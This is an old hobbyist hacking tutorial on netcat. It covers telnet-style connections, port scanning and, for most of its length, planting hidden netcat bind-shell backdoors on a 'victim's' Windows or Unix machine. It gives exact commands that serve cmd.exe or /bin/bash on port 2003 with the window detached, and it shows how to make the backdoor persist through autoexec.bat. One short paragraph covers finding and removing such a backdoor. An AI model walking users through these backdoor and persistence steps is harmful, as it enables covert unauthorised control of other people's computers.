Guide to (mostly) Harmless Hacking: how to use netcat

But before you read this guide, you should probably already know how to use telnet and write batch files, both of which can be located on the main GTMHH page. (Speaking of which, it's just best to read all of the GTMHH first.)

So, first off lets show netcat as a telnet client. Heres how netcat works:

NOTE: From here on I'm assuming that Windows is installed onto drive C:. If it's something else like Z: then just change accordingly.

Obviously you're going to first download and install netcat. For Windows, get the right version and unzip it to whatever directory you like. Just make sure that you copy the nc.exe file to the C:\WINDOWS\System32 or C:\WINNT\System32 directory when on Windows NT/2000/XP. For 95/98/ME, copy it to C:\WINDOWS.

On UNIX, you'll need to get the appropriate version, unpack it, and then view the readme for install instructions.

Open up the command prompt for your system. For Windows, this will mean Start -> Programs -> Accessories -> MS-DOS Prompt or Start -> Programs -> MS-DOS Prompt or Start -> All Programs -> Accessories -> Command Prompt. For UNIX, you should already know how to get to it.

Now type the following command and hit the ENTER key:

nc

Here's how this will work:

nc - runs netcat
- what IP or hostname to connect to

- port to connect to on the IP or hostname

Heres an example:

nc 10.0.0.1 23

That would connect to 10.0.0.1 on port number 23.

It's just like using telnet but has many more features that I'll now cover.

Next, I'll discuss one of my favorite parts of the program: it allows you to set up backdoor ports on a compromised system. This is way easier than programming backdoors using sockets, and easier than editing inetd.conf entries. So how do you do it? Let's cover Windows NT/2000/XP first.

Get a copy of the nc.exe file onto the target C:\WINDOWS\System32\ directory and run the command "nc -L -d -p 2003 -t -e cmd.exe" (without the quotes). What did this do? It set up a backdoor that would open up a MS-DOS shell when connected to at port 2003. (So if you were to telnet to the victem's computer on port 2003, you would get a command prompt from which you have total control over the system.)

How did it work? Here:

nc - ran netcat
-L - tells netcat to stay open and listen (set up a backdoor)
-d - tells netcat to detach (don't open up a window on the victem's computer when listening)
-p 2003 - tells netcat when listening to listen to port 2003 (you could change 2003 to whatever other port you choose)
-t - tells netcat to accept telnet connections
-e cmd.exe - tells netcat to open up cmd.exe (the MS-DOS shell) when connected to

How about Windows 95/98/ME? Do the exact same thing as you did with NT/2000/XP, exept just put the nc.exe file onto the C:\WINDOWS\ directory, and when you run the command, change the end to "-e command.com" instead of "-e cmd.exe" so that you'll run the 95/98/ME MS-DOS shell.

In case you haven't noticed, if the target reboots the computer then the backdoor won't be running anymore. How can we fix this? Open up the file C:\autoexec.bat in a text editor by typing the command "edit \autoexec.bat" in your backdoor and add to the end of the file the command that you want to run when the computer starts ("nc -L -d -p 2003 -t -e cmd.exe" or whatever it is). Then save and exit.

Alright, we've got the backdoor working on Windows, but what about Unix? Install netcat on the target system (even though most systems come pre-installed with it). Then run the command "nc -nvv -l -p 2003 -e /bin/bash". If you ran the backdoor on Windows, then you should pretty well know how this works, but anyway:

nc - runs the netcat program
-nvv - the n part says to not do a host lookup (kinda advanced but kinda not...) and the vv says to do double verbose (output as much information as possible) while a single v says to do just a normal verbose (just output a little more information)
-l - tells netcat to stay open and listen
-p 2003 - tells netcat when listening to listen to port 2003 (you could change 2003 to whatever other port you choose)
-e /bin/bash - tells netcat to open up /bin/bash (one of the many Unix shells) when connected to (you could also choose /bin/sh, /bin/tcsh, etc. if you wish)

You may say, "When I run the command it just says command not recognized!" This is most likely because the directory you installed netcat to is not in the system path. You have three options: install netcat to a directory like /usr/local which is in the system path, set the system path to also include the directory that you installed netcat to, or just "cd" to the directory that you installed netcat to and include a "./" in front of the netcat command ("./nc -nvv -l -p 2003 -e /bin/bash").

Also, on some Unix systems the rpm version of netcat won't let you use the "-e" option - so you can't use backdoors with that. What you need to do is install the .tar.gz or .tgz version of netcat that will allow you to use "-e".

So now that you're having fun and impressing your friends with this new netcat backdoor, you get fustrated when you find out that you've been cracked and you think that the netcat backdoor is running on your system! "How do I get rid of this thing!?" Well, first I'd check C:\autoexec.bat for a netcat entry (or /etc/inetd.conf for Unix). If you find one, delete it and find the program that's running the backdoor. This can be done by simply searching for "nc" or "nc.exe" but most likely the attacker will have changed the filename to something else. In Windows you can CTRL + ALT + DEL and find a suspicious looking process to terminate. Or with Unix you can use the "ps" command to find a program that's running a netcat backdoor. Beyond that just use common sense for techniques that will eliminate the backdoor.

Now that I've gotten done with the backdoor side of netcat, let's discuss port scanning with netcat. Netcat doesnt have any stealth options, but it does a definite connect and after a specific timeout it will disconnect and go to the next port. Heres how it works:

nc -z -w2 0.0.0.0 1-6000

nc - runs netcat
-z - tells netcat to run a portscan
-w2 - tells netcat the time after which to disconnect - here its 2 seconds
0.0.0.0 - the target IP address - this is where you put the target IP or hostname
1-6000 - tells netcat the range of ports to scan - here it was port 1 to 6000

If you want, you can add the option -v or -vv to see more of whats going on in netcat.

Heres an example of a portscan:

nc -vv -z -w2 10.0.0.1 1-6000

Basically, the port scanning is very simple to understand. So, theres no big long explenation or anything.

Well, this ends my guide to netcat. I hope you learned everything here. Go ahead and play around with netcat - it's my favorite tool that I've ever used (besides of course those lovely network sniffers...). If you ever need help, feel free to e-mail me.